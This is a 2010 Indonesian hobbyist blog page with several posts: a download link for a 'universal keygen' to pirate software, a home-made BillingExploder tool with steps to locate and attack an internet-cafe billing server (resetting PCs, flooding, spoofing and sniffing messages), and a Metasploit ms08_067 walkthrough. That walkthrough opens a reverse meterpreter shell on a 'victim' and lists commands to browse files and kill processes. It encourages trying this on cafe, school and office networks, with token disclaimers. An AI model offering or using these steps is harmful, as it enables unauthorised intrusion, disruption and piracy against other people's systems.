Sabtu, 29 Mei 2010

5

10 Gadget Terbaik untuk Windows 7

  • Sabtu, 29 Mei 2010
  • Nurkholish Ardi Firdaus

  • Baru mencoba Windus Pitu (Windows Seven)?????

    Udah tw gadget blom, itu loh yang di desktop kaya Jam, dsb
    Q punya nih 10 gadget terbaik untuk Windows 7, bagi kamu yang megang seven wajib mempunyainya. Download Yaaaa.................

    Download - Ziddu
    2

    Segudang Serial Number

  • Nurkholish Ardi Firdaus

  • Hari gini msih cari keygen,sn,patch di internet???, hati2 loh ,biasanya byak malware yang ikut ndompleng di keygen atau patch yg km dunlud di intrnet!!!
    Tapi tenang aja, gua punya program Yang mrupakan Keygen Universal.
    Lebih dari ratusan sn untuk berbagai app ada disini!!!. Ga percaya???? download aja!!!



    Ziddu

    Tapi lebih baik dan kita bs lbh mnghargai programers jka qt mmbeli lisensi yang resmi!!.Ok cuyyyyyyyy
    5

    Hacking Billing Explorer 6 Dengan BillingExploder 1.6

  • Nurkholish Ardi Firdaus


  • Dengan sgenap kringat yg kute2skan, sgenap wktu yg kuluangkan .he3 akhrnya q mmbt sbuah prgrm sdrhana untuk mengeksploitasi BillingServer
    Nama programnya adlh BillingExploder, h3
    Tapi prgram ini jgn dibt untk kjahatan yaaaaaaaaaaaa.......................

    Langsung aj, q ingin brbagi dg semuanya
    Download prgramnya:
    Ziddu


    Kalo udah, jalanin programmnya, maka muncul deh:


    Tenang2, biasa aj jgn lebah, eh lebay!!
    tuh kn udh dperingatin jgn bt nyakiti orng lain tuh program.he3
    Klik Yes , ok brotha!!!

    Muncul deh



    Masukkan nomor IP Server billing,!!!!!!! msa kaya gitu aj g th sih????????????
    Kalo g th almt ipnya, masuk ke CMD:
    Run> cmd enter
    ketik :

    net view


    lalu enter
    trus muncul deh nma2 kmptr di LocalNet warnet kamu
    trus cari nma kmptr srvr, biasanya nmanya pling aneh dan mnjukkan bhwa it kmptr server cntoh: Server, Billing dll

    tinggal di Ping deh

    Ping NamaKomputer

    Keluar deh nmr IP nya, biasanya formatnya: 192.168.xxx.xxx
    masukkan dh nmr ip itu ke BillingExploder lalu klic tmbl 'Connect'
    kalo brhsil, Statusnya akn brbh mnjd 'Connected to 192.168.xxx.xxx', trus mncul deh info warnet kamu kaya gini (maaf y kpd wrnet yg q cb, he3)


    Ya udah cuy,,, tnggl ngereset (tp jgn kseringan)
    Reset bada 2 macam
    1. Single reset: mereset PC kmptr trtentu (semua kmptr bisa)
    2. Mass reset : meseset PC dr no X sampai Y

    ada jg tool2 laen kaya
    1. Msg sender: ngrim psn atas nma pc laen
    2. Flodder : mlakukan flooding thdp server
    3. Data chat: fungsinya sama kaya prgram 'Client Test'
    4. Msg sniffer : memata2i psan yang dkirim atara semua PC


    Selamat mencoba, !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!


    Kamis, 27 Mei 2010

    4

    Exploiting/Hacking Windows XP dengan Metasploit

  • Kamis, 27 Mei 2010
  • Nurkholish Ardi Firdaus
  • Hahahaha, hari gini masih posting spt ini??? Gpp, mungkin sudah banyak orang yang mempostingkan hal ini, tapi ini 100% buatan q loooh, ;). ok langsung aja
    kali ini q mau main2 sama Metasploit, metasploit adlh exploit engine yang mempunyai segudang exploit untuk berbagai OS, dari Windus, Linux, Unix , Mac OS smuanya ada dsini. Fungsinya adlah biasanya dgunakan utk melakukan testing keamanan sebuah jaringan. Metode exploitasinya jg brmacem2, ada module yang mengexploitasi kelemahan OS (ex, WIndus: DCOM-RPC), Software (ex: Mozzila), dsb.
    Kita bisa praktekin di warnet, network sekolah, kantor dsb. Tapi jgn d slahgunain yaaaaaa...
    Aplikasinya bisa di dunlud disini
    OK, kalo udah di dunlud,ya d install kalo udah ya dibuka!!!!
    yuk qt praktekin booooooo.......
    Kalo dibuka, biasanya loadingnya lmayan lama......, nih gmbar lg loading



    Ditunggu aja,, okkkkk................


    Wah kyakya udah slesai loding nih,,, biasanya lngsung kluar terminal metasploi
    t yang brwrna-wrni, keren yah!!!!!!!!




    Modal:
    qt hrus tahu almat ip korban, ip kita


    Kali ini qt akan menggnken:


    Module : ms08_067_netapi
    Payload : meterpreter_reverse_tcp

    ya udh ketik:

    use windows/smb/ms08_067_netapi




    lalu enter
    ketik lagi


    set rhost ip_korban ,(contoh: set rhost 192.168.1.100), lalu enter

    set lhost ip_kita ,(contoh: set lhost 192.168.1.108), lalu enter


    set lport 4444 , lalu enter



    set payload windows/meterpreter/reverse_tcp



    kalo udah diketik smua printah diatas, lalu
    Untuk memulai exploit ketiklah

    exploit , lalu enter





    Nah, akhirnya kita udah bisa masuk ke sesi meterpreter (meterpreter>)
    Itu artinya komputer korban mengatakan 'SENDIKO NDAWUH NDORO, KULO MANUT KALIYAN NDORO',,, hahahaha
    atau dengan kata lain akses root kmptr korban sdh brada ditangan kita.

    Ya udah, kamu terserah mau ngapain.
    Tips:

    untuk masuk ke sesi Command Prompt ketik:

    shell

    untuk berpindah direktori kerja di kmptr krbn ketik:

    cd [Nama Folder]

    Untuk berpindah direktori kerja di kmptr kita ketik:

    lcd [Nama Folder]

    Untuk mengetahui daftar file korban di folder yang sedang kita bt kerja ketik:

    ls

    Untuk menegtahui daftar process kmptr korban ketik:

    ps

    Untuk menghentikan proccess di kmptr krban ketik:

    kill [PID Proccess]


    Dan msh bnyak lagi prntah2 lainnya spt:
    mendownload file korban
    mengupload file kita ke kmptr krbn
    dll

    Selengkapnya dpt dilihat dg mengetik:

    help


    HAPPY PENETRATING!!!!!







    Subscribe